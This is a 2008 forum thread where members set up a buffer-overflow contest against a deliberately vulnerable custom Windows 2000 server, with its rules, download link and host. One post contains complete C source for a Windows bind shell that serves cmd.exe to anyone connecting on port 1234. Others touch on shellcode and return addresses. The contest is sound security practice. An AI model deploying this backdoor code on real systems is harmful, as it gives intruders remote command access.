Security practice (contest)

h57xiucj2z946q · 15-07-2008 8:04pm

conceited wrote: »

Funny thing for an isp to do isn't it .I wonder whats their reason for doing such a thing?

many did this to stop windows specific worms spreading like crazy years ago.

Will the the next challenge require a unique or self made exploit?

conceited · 16-07-2008 11:31pm

That was ages ago .
I was busy all day today thought i'd have time but hadn't enough.
Tomorrow I'm not so busy so i'll have something ready for the evening.
Not sure exactly what yet .And if i did i wouldn't tell ya.:pac:

h57xiucj2z946q · 17-07-2008 12:46pm

Should be good fun,

Maybe you should start a new thread for the next challenge?

conceited · 17-07-2008 10:16pm

Hi damo,

I have a great idea in my head for a challenge and thought programs would be available but there not.
To implement it I'll have to write my own programs.I've no idea how long this will take either as it's a small bit complicated.

If you want lads I can still host some servers in the mean time for you to practice on.Today I setup an operating system but it might be too difficult.I dunno, Let me know .

C\m\C · 18-07-2008 12:03am

lo all

i rate myself best man in the country apart from my own people
im out of retirment, yes im back
what is the prize for the contest?
im rusty these days, bring it on!

gerryk · 18-07-2008 2:39pm

Out of retirement, eh? Things may have changed since your day, ol' man

Stamen · 18-07-2008 11:33pm

Sounds interesting...

h57xiucj2z946q · 19-07-2008 1:13am

This is a challenge I've been working on, its not fully finished but it could be fun.
Its difficulty would be medium to hard. Its designed to work on Windows 2000 Sp0-Sp4 or Windows Xp Sp0-Sp1. It may be possible to have this challenge for Windows Xp Sp2/3 however, that would be alot more difficult (On the challengers part

)

Using public security scanners would be no good, as its a custom tool I made, and will require its own unique attack/exploit. Metasploit or the likes are no good here.

Its not fully finished and I need to sort some things out like if the server crashes (due to attack!?!) that it will automatically restart and stuff like that.

I will probably need someone who has a stable connection to host it. Can be in a virtual machine. Actually I recommended it to be in a virtual machine if you don't have an old box lying around. You don't want it on your main os :-D

Here is some snaps of the challenge. Obviously I don't show you the internals of the attack, just it working

h57xiucj2z946q · 19-07-2008 2:24am

also check these out:

http://www.smashthestack.org/index.php?option=com_content&task=view&id=3&Itemid=4
http://www.rootcontest.com/index.php?p=boxes

conceited · 19-07-2008 1:40pm

Alright Damo.

That challenge looks really interesting.I have no bother hosting as long as you give me source with the server/client.

h57xiucj2z946q · 19-07-2008 1:44pm

yes thats understandable, I also dont have thread support so it'll only take 1 connection at a time.

also we need to use firedaemon or application as service so when the program terminates, the daemon will restart it.

conceited · 19-07-2008 2:02pm

Thats going to be some challenge

1 connection a time is loads anyway for something like this.

Martyr · 19-07-2008 2:50pm

don't mean to interfere with what you're doing, Damo.
while writing 64-bit shellcodes, i used the following as example.



#include <stdio.h>
#include <winsock2.h>

DWORD WINAPI ThreadProc(LPVOID lpParameter)
{
      PROCESS_INFORMATION pi;
      STARTUPINFO si;

      ZeroMemory(&si,sizeof(si));
      ZeroMemory(&pi,sizeof(pi));

      si.cb	    = sizeof(si);
      si.hStdError  = lpParameter;
      si.hStdInput  = lpParameter;
      si.hStdOutput = lpParameter;
      si.dwFlags    = STARTF_USESTDHANDLES;

      CreateProcess(NULL,"cmd",NULL,NULL,TRUE,0,NULL,NULL,&si,&pi);
      WaitForSingleObject(pi.hProcess,INFINITE);

      CloseHandle(pi.hProcess);
      CloseHandle(pi.hThread);

      closesocket((SOCKET)lpParameter);
      ExitThread(0);
}

int main(int argc, char **argv[])
{
      WSADATA wsaData;
      SOCKADDR_IN service;
      SOCKET server,client;

      if((WSAStartup(MAKEWORD(2,0),&wsaData)) == 0) {

          if((server = WSASocket(AF_INET,SOCK_STREAM,IPPROTO_IP,NULL,0,0)) != INVALID_SOCKET) {

              service.sin_addr.S_un.S_addr   = INADDR_ANY;
              service.sin_port               = htons(1234);
              service.sin_family             = AF_INET;

              if(!bind(server,(SOCKADDR*)&service,sizeof(service))) {

                  if(!listen(server,0)) {

                      while((client = accept(server,0,0)) != SOCKET_ERROR) {
                          
                          CloseHandle(CreateThread(NULL,0,ThreadProc,(LPVOID)client,0,NULL));
                      }
		  }
              }
              closesocket(server);
          }
	WSACleanup();
	}
	return(0);
}

but if you'd rather have 1 connection at a time, thats fine.
actually, you might have to edit the listen() parameter...

h57xiucj2z946q · 19-07-2008 3:25pm

cheers Average Joe, but i'll leave it, im not great at coding :-)

h57xiucj2z946q · 19-07-2008 7:08pm

C:\>nc xxx.xxx.xxx.xxx 54333
Welcome to Damo's security challenge.
You have to try and get access to this server.

The server OS is Windows 2000 SP4 (english)
Only this port (54333) is open.
The server is running Damo's SecContest v1.0
Download: http://damohere.freehostia.com/seccontest.zip
That's all the infomation you are getting...

Rules are:
1. Download and debug the server locally on your own machine.
2. Find a weakness inthe server.
3. Code an exploit for the server.
4. Test this exploit on your own machines.
NOTE: when and only when this exploit works for you, then launch the attack against the server we hosted.
REMINDER: Win 2000 SP4!
We say get the exploit working in your own environment first as if you crash the server due to a bad exploit (we don't want DoS

, it has to be manually restarted.
5. When you get access, put your name in a .txt on the Administrator's Desktop
6. No ill behaviour

Please enter your name: Damo

Thank you! Goodbye...

conceited will post ip later when its up, for now, you can start debugging the executable in the link above. :-)

Martyr · 19-07-2008 7:19pm

cool.
can you email it to me please, think my 3g phone is blocking connection to the file..

i get redirected to freehostia.com

h57xiucj2z946q · 19-07-2008 7:38pm

Done.

conceited · 19-07-2008 8:17pm

Using dyndns incase my ip changes here's the link for the server.
hostname : conceited.homeunix.org

Damo your file can't be downloaded by me either .Here's a link to the one you gave me just incase your not online.

Thanks alot Damo2k

Martyr · 19-07-2008 8:54pm

edit.

h57xiucj2z946q · 19-07-2008 8:59pm

If you overflow it on a winxp machine, then your almost there. Just remember 1 little thing will have a different address on 2k sp4

Martyr · 19-07-2008 9:13pm

i'm just wondering if your program will run in VM as planned, what difference will this make?
how would it affect the overflow?

h57xiucj2z946q · 19-07-2008 9:22pm

I coded and tested it in vmware. It should be fine.

conceited · 19-07-2008 9:32pm

Ah joe why are you posting all this info?

Martyr · 19-07-2008 9:36pm

ok, sorry, its removed.
just thought it would help interest others.

h57xiucj2z946q · 19-07-2008 9:53pm

I think if yo get the exploit working on your own win2k sp0-1 winxp0-1 its just a matter of changing one little thing to make it work on the desired os.

Martyr · 19-07-2008 9:58pm

so you're saying if it works on win2k sp0, it will work on sp4 too?
i'm about to setup a win2k machine, but probably won't do anything tonight.

h57xiucj2z946q · 19-07-2008 10:07pm

There is only one little thing different between the os's (commin from a "goto esp" point of view) most of the shell code should be the same.
xp sp2 introduced DEP which makes things harder.

h57xiucj2z946q · 20-07-2008 2:40pm

Guy's, the server is up and I can confirm that it is exploitable... see snapshot.

conceited · 20-07-2008 3:11pm

Best challenge so far.
I'm having a crack at it now and will be for the whole day.
Thanks Damo .:pac: Nice challenge.

h57xiucj2z946q · 20-07-2008 6:28pm

is anyone making progress?

Security practice (contest)

Comments